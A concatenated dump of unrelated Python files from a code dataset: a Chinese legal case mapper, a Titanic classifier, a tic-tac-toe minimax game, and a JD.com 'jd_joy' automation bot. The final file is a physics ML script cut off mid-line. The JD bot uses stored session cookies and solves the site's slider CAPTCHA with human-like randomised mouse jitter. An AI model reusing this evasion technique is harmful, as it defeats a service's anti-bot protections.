u'生产、销售劣药罪': u'破坏社会主义市场经济秩序罪',\r\n u'技术委托开发合同纠纷': u'知识产权合同纠纷',\r\n u'表演者权': u'知识产权权属侵权纠纷',\r\n u'追收抽逃出资纠纷': u'与破产有关的纠纷',\r\n u'供用水合同纠纷': u'合同纠纷',\r\n u'探矿': u'合同纠纷',\r\n u'集体合同': u'劳动争议',\r\n u'货运': u'合同纠纷',\r\n u'人寿保险合同纠纷': u'保险纠纷',\r\n u'暴动越狱罪': u'妨害社会管理秩序罪',\r\n u'彩票奖券纠纷': u'合同纠纷',\r\n u'侵犯': u'知识产权权属侵权纠纷',\r\n u'房屋买卖': u'合同纠纷',\r\n u'期货经纪': u'期货交易纠纷',\r\n u'商业诋毁纠纷': u'不正当竞争纠纷',\r\n u'商标使用许可': u'知识产权合同纠纷',\r\n u'对外追收债权纠纷': u'与破产有关的纠纷',\r\n u'引诱、容留、介绍卖淫罪': u'妨害社会管理秩序罪',\r\n u'用益物权确认': u'物权保护纠纷',\r\n u'聚众阻碍解救被收买的妇女、儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n u'证券投资基金权利确认纠纷': u'证券纠纷',\r\n u'非法集会、游行、示威罪': u'妨害社会管理秩序罪',\r\n u'被继承人债务清偿纠纷': u'继承纠纷',\r\n u'盗窃、抢夺枪支、弹药、爆炸物、危险物质罪': u'危害公共安全罪',\r\n u'技术服务': u'知识产权合同纠纷',\r\n u'房产': u'所有权纠纷',\r\n u'劳务派遣': u'侵权责任纠纷',\r\n u'玩忽职守罪': u'渎职罪',\r\n u'执行判决、裁定滥用职权罪': u'渎职罪',\r\n u'出版': u'知识产权权属侵权纠纷',\r\n u'证券交易合同纠纷': u'证券纠纷',\r\n u'海难救助合同纠纷': u'海事海商纠纷',\r\n u'背信损害上市公司利益罪': u'破坏社会主义市场经济秩序罪',\r\n u'恶意提起知识产权': u'知识产权权属侵权纠纷',\r\n u'录音': u'知识产权权属侵权纠纷',\r\n u'无因管理': u'知识产权权属侵权纠纷',\r\n u'商标质押': u'知识产权合同纠纷',\r\n u'人格权': u'人格权纠纷',\r\n u'申请认可和执行香港特别行政区仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'企业名称': u'知识产权权属侵权纠纷',\r\n u'技术服务合同纠纷': u'知识产权合同纠纷',\r\n u'网络域名': u'知识产权合同纠纷',\r\n u'重作': u'物权保护纠纷',\r\n u'客运班线': u'合同纠纷',\r\n u'遗赠': u'继承纠纷',\r\n u'走私武器、弹药罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法向外国人出售、赠送珍贵文物罪': u'妨害社会管理秩序罪',\r\n u'辞职': u'人事争议',\r\n u'信用证转让纠纷': u'信用证纠纷',\r\n u'抚养': u'婚姻家庭纠纷',\r\n u'合伙企业': u'信用证纠纷',\r\n u'侵害企业': u'与企业有关的纠纷',\r\n u'测试合同纠纷': u'合同纠纷',\r\n u'确认人民调解协议效力': u'合同纠纷',\r\n u'聚众冲击国家机关罪': u'妨害社会管理秩序罪',\r\n u'企业公司制改造合同纠纷': u'与企业有关的纠纷',\r\n u'证券虚假陈述责任纠纷': u'证券纠纷',\r\n u'教育机构责任纠纷': u'侵权责任纠纷',\r\n u'汽车': u'所有权纠纷',\r\n u'发明': u'知识产权权属侵权纠纷',\r\n u'强迫卖血罪': u'妨害社会管理秩序罪',\r\n u'专利权宣告无效后返还费用纠纷': u'知识产权权属侵权纠纷',\r\n u'别除权纠纷': u'与破产有关的纠纷',\r\n u'一般取回权纠纷': u'与破产有关的纠纷',\r\n u'商品房预售': u'合同纠纷',\r\n u'铁路修建': u'合同纠纷',\r\n u'股东利益': u'信用证纠纷',\r\n u'对有影响力的人行贿罪': u'贪污贿赂罪',\r\n u'企业': u'信用证纠纷',\r\n u'股东知情': u'信用证纠纷',\r\n u'引诱幼女卖淫罪': u'妨害社会管理秩序罪',\r\n u'重大飞行事故罪': u'危害公共安全罪',\r\n u'因申请先予执行损害责任纠纷': u'侵权责任纠纷',\r\n u'海上通海水域运输重大责任事故责任纠纷': u'海事海商纠纷',\r\n u'消防责任事故罪': u'危害公共安全罪',\r\n u'变更抚养关系纠纷': u'婚姻家庭纠纷',\r\n u'确认不侵害商标权纠纷': u'知识产权权属侵权纠纷',\r\n u'非法出售增值税专用发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'相邻土地建筑物利用关系纠纷': u'所有权纠纷',\r\n u'邮寄服务合同纠纷': u'合同纠纷',\r\n u'伪造、出售伪造的增值税专用发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'技术转化合同纠纷': u'知识产权合同纠纷',\r\n u'拐骗儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n u'借用合同': u'合同纠纷',\r\n u'委托代建': u'合同纠纷'\r\n}\r\n\r\n\r\ndef case_reason_mapper(case_reason):\r\n \"\"\"\r\n 匹配案由\r\n :param case_reason:\r\n :return:\r\n \"\"\"\r\n if case_reason in case_map_dict.keys():\r\n result = case_map_dict[case_reason]\r\n else:\r\n result = u'其他'\r\n return result\r\n","sub_path":"source/src/plugins/Lawsuits/CaseReasonMapper.py","file_name":"CaseReasonMapper.py","file_ext":"py","file_size_in_byte":117128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"116122812","text":"#!/usr/bin/env python3\n\nFNAME = \"/home/pi/.photoctl\"\ntry:\n with open(FNAME, \"r\") as ff:\n curr = ff.read().strip()\nexcept IOError:\n # Create the file\n open(FNAME, \"w+\")\n curr = \"START\"\n\nnew = \"PAUSE\" if curr == \"START\" else \"START\"\n\nwith open(FNAME, \"w\") as ff:\n ff.write(new)\nprint(new)\n","sub_path":"togglepause.py","file_name":"togglepause.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"605019884","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 22 10:25:26 2020\r\n\r\n@author: obaris\r\n\"\"\"\r\n\r\n# This Python 3 environment comes with many helpful analytics libraries installed\r\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\r\n# For example, here's several helpful packages to load\r\n\r\nimport numpy as np # linear algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\r\n\r\n# Input data files are available in the read-only \"../input/\" directory\r\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\r\n\r\nimport os\r\nfor dirname, _, filenames in os.walk('/kaggle/input'):\r\n for filename in filenames:\r\n print(os.path.join(dirname, filename))\r\n\r\n# You can write up to 5GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using \"Save & Run All\" \r\n# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session\r\n \r\ntrain_data = pd.read_csv(\"C:/01_Projects/09_CriticalFormulasandTools/PythonScripts/TitanicData/train.csv\")\r\ntrain_data.head()\r\n\r\ntest_data = pd.read_csv(\"C:/01_Projects/09_CriticalFormulasandTools/PythonScripts/TitanicData/test.csv\")\r\ntest_data.head()\r\n\r\ny = train_data[\"Survived\"]\r\n\r\nfeatures = [\"Pclass\", \"Sex\", \"SibSp\", \"Parch\"]\r\nX = pd.get_dummies(train_data[features])\r\nX_test = pd.get_dummies(test_data[features])\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nmodel = RandomForestClassifier()\r\nmodel.fit(X, y)\r\npredictions = model.predict(X_test)\r\n\r\noutput = pd.DataFrame({'PassengerId': test_data.PassengerId, 'Survived': predictions})\r\noutput.to_csv('my_submission.csv', index=False)\r\nprint(\"Your submission was successfully saved!\")\r\n\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import roc_curve, precision_recall_curve, auc, make_scorer, recall_score, accuracy_score, precision_score\r\nfrom sklearn.metrics import confusion_matrix, f1_score\r\n\r\nparam_grid = {\r\n 'n_estimators' : [50, 100, 150, 200, 250, 300, 400, 500],\r\n 'max_features' : ['auto', 'sqrt'],\r\n 'max_depth': [None, 5, 10, 15, 20, 25, 30, 40, 50],\r\n 'min_samples_split': [3, 4, 5, 10, 20],\r\n 'min_samples_leaf': [1, 2, 4],\r\n 'bootstrap': [True, False]\r\n}\r\n\r\nscorers = {\r\n 'precision_score': make_scorer(precision_score),\r\n 'recall_score': make_scorer(recall_score),\r\n 'accuracy_score': make_scorer(accuracy_score),\r\n 'f1_score': make_scorer(f1_score)\r\n}\r\n\r\n\r\ndef grid_search_wrapper(refit_score='f1_score'):\r\n\r\n \"\"\"fits a GridSearchCV classifier using refit_score for optimization\r\n prints classifier performance metrics\"\"\"\r\n \r\n grid_search = GridSearchCV(model, param_grid, scoring=scorers, refit=refit_score, cv=10, return_train_score=True, n_jobs=-1)\r\n\r\n grid_search.fit(X, y)\r\n\r\n # make the predictions\r\n labels_pred = grid_search.predict(X)\r\n\r\n print('Best params for {}'.format(refit_score))\r\n print(grid_search.best_params_)\r\n\r\n # confusion matrix on the test data.\r\n print('\\nConfusion matrix of Random Forest optimized for {} on the test data:'.format(refit_score))\r\n print(pd.DataFrame(confusion_matrix(y, labels_pred),\r\n columns=['pred_neg', 'pred_pos'], index=['neg', 'pos']))\r\n return grid_search\r\n\r\ngrid_search_clf = grid_search_wrapper()","sub_path":"TitanicData/TitanicDataset_Kaggle.py","file_name":"TitanicDataset_Kaggle.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"286740084","text":"'''\r\nThis is a simple tic tac toe game that utilizes the algorithm \"Minimax\" in order to find the optimum move without explecetly programming the moves\r\nthe computer always takes the x and the player is left with o.\r\nit is impossible to win against the computer, only a Tie or a loss can be achieved.\r\nthere is a huge room for improving the code in terms of speed and efficiency, but I think for a game this simple clarity is more important than efficiency.\r\n\r\nCreated by: Musab Schluck\r\n'''\r\n\r\nfrom copy import deepcopy \r\n\r\ndef print_board(): # - Used to print the main board\r\n for i, value in enumerate(the_board, 1):\r\n print(value, end = ' ')\r\n if i%3 == 0: print()\r\n\r\ndef h_move(): # - allowing the human player(o) to play his/her turn\r\n c = int(input('enter a non taken number between 1 - 9: '))\r\n if c == the_board[c-1]:\r\n the_board[c-1] = current_player\r\n\r\ndef c_move(): # - allowing the computer(x) to play its turn\r\n c = minimax(the_board, depth(the_board), True)\r\n c = c[1]\r\n the_board[c-1] = current_player\r\n\r\ndef play(): # - choosing between two function to call based on the turn of the game\r\n global current_player\r\n if turn%2 == 0:\r\n current_player = 'o'\r\n h_move()\r\n else:\r\n current_player = 'x'\r\n c_move()\r\n\r\ndef return_winning(b, player): # - returning true if one of the players has won, otherwise returning false\r\n if (b[0] == player and b[1] == player and b[2] == player)or\\\r\n (b[3] == player and b[4] == player and b[5] == player)or\\\r\n (b[6] == player and b[7] == player and b[8] == player)or\\\r\n (b[0] == player and b[3] == player and b[6] == player)or\\\r\n (b[1] == player and b[4] == player and b[7] == player)or\\\r\n (b[2] == player and b[5] == player and b[8] == player)or\\\r\n (b[0] == player and b[4] == player and b[8] == player)or\\\r\n (b[2] == player and b[4] == player and b[6] == player):\r\n return True\r\n else: return False\r\n \r\ndef return_empty_values(b): # - return a list of non taked values\r\n return [x for x in b if isinstance(x, int)]\r\n\r\ndef is_terminal(b): # - returns true if a winning comabnation is reached\r\n w_c = [(0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6)]\r\n for c in w_c:\r\n if b[c[0]] == b[c[1]] and b[c[1]] == b[c[2]]: return True\r\n \r\ndef depth(b): # - return the number of non taked values in a board\r\n d = 0\r\n for i in b:\r\n if isinstance(i, int): d += 1\r\n return d\r\n\r\ndef evaluate(b): # - assigning values to boards based on the faviorability of player x\r\n w_c = [(0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6)]\r\n for c in w_c:\r\n if b[c[0]] == b[c[1]] and b[c[1]] == b[c[2]] and b[c[2]] == 'x': return [20-depth(b), -1]\r\n elif b[c[0]] == b[c[1]] and b[c[1]] == b[c[2]] and b[c[2]] == 'o': return [-10+depth(b), -1]\r\n return [10-depth(b), -1]\r\n\r\ndef moves_boards(b, player = 'x'): # returns a list that has pairs of the moves taken and the lists resulted from taking those moves for example: [ [1,['x',2,3,4,5,6,7,8,9,]], [1,[1,'x',3,4,5,6,7,8,9,]], ... ]\r\n available_values = [x for x in b if isinstance(x, int)]\r\n possible_boards = []\r\n output = []\r\n for i in available_values:\r\n c = deepcopy(b)\r\n c[i-1] = player\r\n output.append([i,c])\r\n return output\r\n\r\ndef minimax(b, depth_of_the_board, max_player): # - the minimax algorithm that searches the game space and returns the best move possible\r\n if (depth(b) == 0) or (is_terminal(b) == True):\r\n return evaluate(b)\r\n\r\n if max_player:\r\n max_eval, best_move = float(\"-inf\"), -1\r\n for move, child in moves_boards(b):\r\n ev = minimax(child, depth_of_the_board-1, False)[0]\r\n max_eval = max(ev, max_eval)\r\n if ev == max_eval: best_move = move\r\n return max_eval, best_move\r\n\r\n else:\r\n min_eval = float('inf')\r\n for move, child in moves_boards(b, 'o'):\r\n ev = minimax(child, depth_of_the_board-1, True)[0]\r\n min_eval = min(ev, min_eval)\r\n return min_eval, -1\r\n\r\nthe_board = [1, 2, 3, 4, 5, 6, 7, 8, 9]\r\ncurrent_player = 'o'\r\n\r\n\"The Game loop\"\r\n\r\nprint(\"Welcome to this game i hope u enjoy it, please wait a bit for the computer to think\")\r\nfor turn in range(len([x for x in the_board if isinstance(x, str)])+1,10):\r\n play()\r\n print_board()\r\n if return_winning(the_board, current_player)== True:\r\n print('player {} has won the match'.format(current_player))\r\n break\r\n print('--------------------this is the computer turn----------------------')\r\nif return_winning(the_board, current_player) != True: print('it is a Tie') \r\n","sub_path":"c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"630698378","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/6/25 9:29 上午\n# @File : jd_joy.py\n# @Project : jd_scripts\n# @Desc : 京东APP->我的->宠汪汪\nimport asyncio\nimport json\nimport os\nimport random\nimport aiohttp\nimport moment\nimport ujson\nfrom dateutil.relativedelta import relativedelta\n\nfrom datetime import datetime\n\nfrom utils.console import println\nfrom urllib.parse import unquote, urlencode\nfrom config import USER_AGENT, IMAGES_DIR\nfrom utils.image import save_img, detect_displacement\nfrom utils.browser import open_page, open_browser\n\n\nclass JdJoy:\n \"\"\"\n 宠汪汪, 需要使用浏览器方式进行拼图验证。\n \"\"\"\n # 活动地址\n url = 'https://h5.m.jd.com/babelDiy/Zeus/2wuqXrZrhygTQzYA7VufBEpj4amH/index.html#/pages/jdDog/jdDog'\n\n headers = {\n \"Accept\": \"application/json,text/plain, */*\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-cn\",\n \"Connection\": \"keep-alive\",\n \"Referer\": \"https://h5.m.jd.com/babelDiy/Zeus/2wuqXrZrhygTQzYA7VufBEpj4amH/index.html\",\n \"User-Agent\": USER_AGENT\n }\n\n def __init__(self, pt_pin, pt_key):\n \"\"\"\n :param pt_pin:\n :param pt_key:\n \"\"\"\n self._cookies = [\n {\n 'domain': '.jd.com',\n 'name': 'pt_pin',\n 'value': pt_pin,\n },\n {\n 'domain': '.jd.com',\n 'name': 'pt_key',\n 'value': pt_key,\n }\n ]\n self._aiohttp_cookies = {\n 'pt_pin': pt_pin,\n 'pt_key': pt_key,\n }\n self._pt_pin = unquote(pt_pin)\n self.browser = None # 浏览器对象\n self.page = None # 页面标签对象\n\n async def validate(self):\n \"\"\"\n :return:\n \"\"\"\n if not self.browser:\n self.browser = await open_browser()\n if not self.page:\n self.page = await open_page(self.browser, self.url, USER_AGENT, self._cookies)\n page = self.page\n validator_selector = '#app > div > div > div > div.man-machine > div.man-machine-container'\n validator = await page.querySelector(validator_selector)\n if not validator:\n println('{}, 不需要拼图验证...'.format(self._pt_pin))\n return True\n else:\n box = await validator.boundingBox()\n if not box:\n println('{}, 不需要拼图验证...'.format(self._pt_pin))\n return True\n\n println('{}, 需要进行拼图验证...'.format(self._pt_pin))\n\n bg_img_selector = '#man-machine-box > div > div.JDJRV-img-panel.JDJRV-embed > div.JDJRV-img-wrap > ' \\\n 'div.JDJRV-bigimg > img'\n\n slider_img_selector = '#man-machine-box > div > div.JDJRV-img-panel.JDJRV-embed > div.JDJRV-img-wrap > ' \\\n 'div.JDJRV-smallimg > img'\n\n for i in range(10):\n\n println('{}, 正在进行第{}次拼图验证...'.format(self._pt_pin, i + 1))\n println('{}, 等待加载拼图验证背景图片...'.format(self._pt_pin))\n await page.waitForSelector(bg_img_selector)\n\n bg_img_ele = await page.querySelector(bg_img_selector)\n\n println('{}, 等待加载拼图验证滑块图片...'.format(self._pt_pin))\n await page.waitForSelector(slider_img_selector)\n slider_img_ele = await page.querySelector(slider_img_selector)\n\n bg_img_content = await (await bg_img_ele.getProperty('src')).jsonValue()\n slider_img_content = await (await slider_img_ele.getProperty('src')).jsonValue()\n\n bg_image_path = os.path.join(IMAGES_DIR, 'jd_pet_dog_bg_{}.png'.format(self._pt_pin))\n slider_image_path = os.path.join(IMAGES_DIR, 'jd_pet_dog_slider_{}.png'.format(self._pt_pin))\n\n println('{}, 保存拼图验证背景图片:{}!'.format(self._pt_pin, bg_image_path))\n save_img(bg_img_content, bg_image_path)\n\n println('{}, 保存拼图验证滑块图片:{}!'.format(self._pt_pin, slider_image_path))\n save_img(slider_img_content, slider_image_path)\n\n offset = detect_displacement(slider_image_path, bg_image_path)\n println('{}. 拼图偏移量为:{}'.format(self._pt_pin, offset))\n\n slider_btn_selector = '#man-machine-box > div > div.JDJRV-slide-bg > div.JDJRV-slide-inner.JDJRV-slide-btn'\n ele = await page.querySelector(slider_btn_selector)\n box = await ele.boundingBox()\n println('{}, 开始拖动拼图滑块...'.format(self._pt_pin))\n await page.hover(slider_btn_selector)\n await page.mouse.down()\n\n cur_x = box['x']\n cur_y = box['y']\n first = True\n total_delay = 0\n shake_times = 2 # 左右抖动的最大次数\n\n while offset > 0:\n if first:\n # 第一次先随机移动偏移量的%60~80%\n x = int(random.randint(6, 8) / 10 * offset)\n first = False\n elif total_delay >= 2000: # 时间大于2s了, 直接拉满\n x = offset\n else: # 随机滑动5~30px\n x = random.randint(5, 30)\n\n if x > offset:\n offset = 0\n x = offset\n else:\n offset -= x\n\n cur_x += x\n\n delay = random.randint(100, 500)\n steps = random.randint(1, 20)\n total_delay += delay\n println('{}, 拼图offset:{}, delay:{}, steps:{}'.format(self._pt_pin, cur_x, delay, steps))\n await page.mouse.move(cur_x, cur_y,\n {'delay': delay, 'steps': steps})\n\n if shake_times <= 0:\n continue\n\n if total_delay >= 2000:\n continue\n\n num = random.randint(1, 10) # 随机选择是否抖动\n if num % 2 == 1:\n continue\n\n shake_times -= 1\n px = random.randint(1, 20) # 随机选择抖动偏移量\n delay = random.randint(100, 500)\n steps = random.randint(1, 20)\n total_delay += delay\n # 往右拉\n cur_x += px\n println('{}, 拼图向右滑动:offset:{}, delay:{}, steps:{}'.format(self._pt_pin, px, delay, steps))\n await page.mouse.move(cur_x, cur_y,\n {'delay': delay, 'steps': steps})\n\n delay = random.randint(100, 500)\n steps = random.randint(1, 20)\n total_delay += delay\n\n # 往左拉\n cur_x -= px\n println('{}, 拼图向左滑动:offset:{}, delay:{}, steps:{}'.format(self._pt_pin, px, delay, steps))\n await page.mouse.move(cur_x, cur_y,\n {'delay': delay, 'steps': steps})\n println('{}, 第{}次拼图验证, 耗时:{}s.'.format(self._pt_pin, i + 1, total_delay / 1000))\n await page.mouse.up()\n await asyncio.sleep(3)\n println('{}, 正在获取验证结果, 等待3s...'.format(self._pt_pin))\n slider_img_ele = await page.querySelector(slider_img_selector)\n if slider_img_ele is None:\n println('{}, 第{}次拼图验证, 验证成功!'.format(self._pt_pin, i + 1))\n break\n else:\n println('{}, 第{}次拼图验证, 验证失败, 继续验证!'.format(self._pt_pin, i + 1))\n\n validator = await page.querySelector(validator_selector)\n if not validator:\n println('{}, 已完成拼图验证...'.format(self._pt_pin))\n return True\n else:\n box = await validator.boundingBox()\n if not box:\n println('{}, 已完成拼图验证...'.format(self._pt_pin))\n return True\n else:\n println('{}, 无法完成拼图验证...'.format(self._pt_pin))\n return None\n\n async def request(self, session, path, body=None, method='GET', post_type='json'):\n \"\"\"\n 请求数据\n :param session:\n :param method:\n :param path:\n :param post_type:\n :param body:\n :return:\n \"\"\"\n try:\n default_params = {\n 'reqSource': 'h5',\n 'invokeKey': 'qRKHmL4sna8ZOP9F'\n }\n if method == 'GET' and body:\n default_params.update(body)\n\n url = 'https://jdjoy.jd.com/common/{}'.format(path) + '?' + urlencode(default_params)\n\n if method == 'GET':\n response = await session.get(url)\n else:\n if post_type == 'json':\n content_type = session.headers.get('Content-Type', None)\n if content_type:\n session.headers.pop('Content-Type')\n response = await session.post(url, json=body)\n else:\n session.headers.add('Content-Type', 'application/x-www-form-urlencoded')\n response = await session.post(url, data=body)\n\n text = await response.text()\n data = json.loads(text)\n if not data['errorCode']:\n if 'data' in data:\n return data['data']\n elif 'datas' in data:\n return data['datas']\n return data\n\n if data['errorCode'] == 'H0001': # 需要拼图验证\n println('{}, 需要进行拼图验证!'.format(self._pt_pin))\n is_success = await self.validate()\n if is_success:\n return await self.request(session, path, body, method)\n return data\n\n except Exception as e:\n println('{}, 获取服务器数据失败:{}'.format(self._pt_pin, e.args))\n return {\n 'errorCode': 9999\n }\n\n async def sign_every_day(self, session, task):\n \"\"\"\n 每日签到\n \"\"\"\n println('{}, 签到功能暂时未完成!'.format(self._pt_pin))\n\n async def get_award(self, session, task):\n \"\"\"\n 领取任务奖励狗粮\n \"\"\"\n path = 'pet/getFood'\n body = {\n 'taskType': task['taskType']\n }\n data = await self.request(session, path, body)\n\n if not data or (data['errorCode'] and 'fail' in data['errorCode']):\n println('{}, 领取任务: 《{}》 奖励失败!'.format(self._pt_pin, task['taskName']))\n else:\n println('{}, 成功领取任务: 《{}》 奖励!'.format(self._pt_pin, task['taskName']))\n\n async def scan_market(self, session, task):\n \"\"\"\n 逛会场\n \"\"\"\n market_list = task['scanMarketList']\n path = 'pet/scan'\n for market in market_list:\n market_link = market['marketLink']\n if market_link == '':\n market_link = market['marketLinkH5']\n params = {\n 'marketLink': market_link,\n 'taskType': task['taskType']\n }\n data = await self.request(session, path, params, method='POST')\n if not data or (data['errorCode'] and 'success' not in data['errorCode']):\n println('{}, 无法完成逛会场任务:{}!'.format(self._pt_pin, market['marketName']))\n else:\n println('{}, 成功完成逛会场任务:{}!'.format(self._pt_pin, market['marketName']))\n await asyncio.sleep(3)\n\n async def follow_shop(self, session, task):\n \"\"\"\n 关注店铺\n \"\"\"\n click_path = 'pet/icon/click'\n shop_list = task['followShops']\n for shop in shop_list:\n click_params = {\n 'iconCode': 'follow_shop',\n 'linkAddr': shop['shopId']\n }\n await self.request(session, click_path, click_params)\n await asyncio.sleep(0.5)\n\n follow_path = 'pet/followShop'\n follow_params = {\n 'shopId': shop['shopId']\n }\n data = await self.request(session, follow_path, follow_params, post_type='body', method='POST')\n if not data or 'success' not in data:\n println('{}, 无法关注店铺{}'.format(self._pt_pin, shop['name']))\n else:\n println('{}, 成功关注店铺: {}'.format(self._pt_pin, shop['name']))\n await asyncio.sleep(1)\n\n async def follow_good(self, session, task):\n \"\"\"\n 关注商品\n \"\"\"\n path = 'pet/icon/click'\n good_list = task['followGoodList']\n\n for good in good_list:\n params = {\n 'iconCode': 'follow_good',\n 'linkAddr': good['sku']\n }\n await self.request(session, path, params)\n await asyncio.sleep(1)\n\n follow_path = 'pet/followGood'\n params = {\n 'sku': good['sku']\n }\n data = await self.request(session, follow_path, params, method='POST', post_type='form')\n if not data:\n println('{}, 关注商品:{}失败!'.format(self._pt_pin, good['skuName']))\n else:\n println('{}, 成功关注商品:{}!'.format(self._pt_pin, good['skuName']))\n\n async def follow_channel(self, session, task):\n \"\"\"\n \"\"\"\n channel_path = 'pet/getFollowChannels'\n channel_list = await self.request(session, channel_path)\n if not channel_list:\n println('{}, 获取频道列表失败!'.format(self._pt_pin))\n return\n\n for channel in channel_list:\n if channel['status']:\n continue\n click_path = 'pet/icon/click'\n click_params = {\n 'iconCode': 'follow_channel',\n 'linkAddr': channel['channelId']\n }\n await self.request(session, click_path, click_params)\n follow_path = 'pet/scan'\n follow_params = {\n 'channelId': channel['channelId'],\n 'taskType': task['taskType']\n }\n data = await self.request(session, follow_path, follow_params, method='POST')\n await asyncio.sleep(0.5)\n if not data or (\n data['errorCode'] and 'success' not in data['errorCode'] and 'repeat' not in data['errorCode']):\n println('{}, 关注频道:{}失败!'.format(self._pt_pin, channel['channelName']))\n else:\n println('{}, 成功关注频道:{}!'.format(self._pt_pin, channel['channelName']))\n await asyncio.sleep(3.1)\n\n async def do_task(self, session):\n \"\"\"\n 做任务\n :return:\n \"\"\"\n path = 'pet/getPetTaskConfig'\n task_list = await self.request(session, path)\n if not task_list:\n println('{}, 获取任务列表失败!'.format(self._pt_pin))\n return\n\n for task in task_list:\n if task['receiveStatus'] == 'unreceive':\n await self.get_award(session, task)\n await asyncio.sleep(1)\n\n if task['joinedCount'] and task['joinedCount'] >= task['taskChance']:\n println('{}, 任务:{}今日已完成!'.format(self._pt_pin, task['taskName']))\n continue\n\n if task['taskType'] == 'SignEveryDay':\n await self.sign_every_day(session, task)\n\n elif task['taskType'] == 'FollowGood': # 关注商品\n await self.follow_good(session, task)\n\n elif task['taskType'] == 'FollowChannel': # 关注频道\n await self.follow_channel(session, task)\n\n elif task['taskType'] == 'FollowShop': # 关注店铺\n await self.follow_shop(session, task)\n\n elif task['taskType'] == 'ScanMarket': # 逛会场\n await self.scan_market(session, task)\n\n async def get_friend_list(self, session, page=1):\n \"\"\"\n 获取好友列表\n \"\"\"\n path = 'pet/h5/getFriends'\n params = {\n 'itemsPerPage': 20,\n 'currentPage': page\n }\n friend_list = await self.request(session, path, params)\n if not friend_list:\n return []\n return friend_list\n\n async def help_friend_feed(self, session):\n \"\"\"\n 帮好友喂狗\n \"\"\"\n cur_page = 0\n while True:\n cur_page += 1\n friend_list = await self.get_friend_list(session, page=cur_page)\n if not friend_list:\n break\n\n for friend in friend_list:\n if friend['status'] == 'chance_full':\n println('{}, 今日帮好友喂狗次数已用完成!'.format(self._pt_pin))\n return\n\n if friend['status'] != 'not_feed':\n continue\n\n feed_path = 'pet/helpFeed'\n feed_params = {\n 'friendPin': friend['friendPin']\n }\n data = await self.request(session, feed_path, feed_params)\n if data and data['errorCode'] and 'ok' in data['errorCode']:\n println('{}, 成功帮好友:{} 喂狗!'.format(self._pt_pin, friend['friendName']))\n else:\n println(data)\n await asyncio.sleep(1)\n await asyncio.sleep(0.5)\n\n async def joy_race(self, session, level=2):\n \"\"\"\n 参与赛跑\n \"\"\"\n click_path = 'pet/icon/click'\n click_params = {\n 'iconCode': 'race_match',\n }\n await self.request(session, click_path, click_params)\n await asyncio.sleep(0.5)\n\n match_path = 'pet/combat/match'\n match_params = {\n 'teamLevel': level\n }\n\n for i in range(10):\n data = await self.request(session, match_path, match_params)\n if data['petRaceResult'] == 'participate':\n println('{}, 成功参与赛跑!'.format(self._pt_pin))\n return\n await asyncio.sleep(1)\n println('{}, 无法参与赛跑!'.format(self._pt_pin))\n\n async def run(self):\n async with aiohttp.ClientSession(headers=self.headers, cookies=self._aiohttp_cookies,\n json_serialize=ujson.dumps) as session:\n await self.joy_race(session)\n await self.help_friend_feed(session)\n await self.do_task(session)\n\n if self.browser:\n await self.browser.close()\n\n\ndef start(pt_pin, pt_key):\n \"\"\"\n 宠汪汪做任务\n \"\"\"\n app = JdJoy(pt_pin, pt_key)\n asyncio.run(app.run())\n\n\nif __name__ == '__main__':\n from utils.process import process_start\n from config import JOY_PROCESS_NUM\n process_start(start, '宠汪汪做任务', process_num=JOY_PROCESS_NUM)\n","sub_path":"jd_joy.py","file_name":"jd_joy.py","file_ext":"py","file_size_in_byte":19301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"602294532","text":"import os\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# data handling and numerical analysis\nimport uproot\nimport awkward as ak\nimport numpy as np\nimport pandas as pd\nfrom coffea import processor, hist\n\nimport scipy\n\n# Plotting / histogramming\nfrom yahist import Hist1D\nimport matplotlib.pyplot as plt\nimport mplhep\nplt.style.use(mplhep.style.CMS)\n\n# Machine learning packages\nimport tensorflow as tf\nfrom keras.utils import np_utils\nimport onnxruntime as rt\nfrom sklearn.utils import resample\nfrom sklearn.metrics import roc_curve, roc_auc_score, auc\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, RobustScaler\nimport joblib\n\n# private modules and functions\nfrom Tools.dataCard import dataCard\nfrom Tools.helpers import finalizePlotDir, mt\nfrom Tools.limits import makeCardFromHist\nfrom processor.default_accumulators import dataset_axis\nfrom plots.helpers import makePlot\nfrom ML.multiclassifier_tools import get_one_hot, get_class_weight, get_sob,\\\n load_onnx_model, predict_onnx, dump_onnx_model,\\\n store_model, load_model,\\\n store_transformer, load_transformer\nfrom ML.models import baseline_model\n\n\ndef test_train(test, train, y_test, y_train, labels=[], bins=25, node=0, plot_dir=None, weight_test=None, weight_train=None):\n ks = {}\n\n fig, ax = plt.subplots(1,1,figsize=(10,10))\n\n h = {}\n for i, label in enumerate(labels):\n \n _ks, _p = scipy.stats.kstest(\n 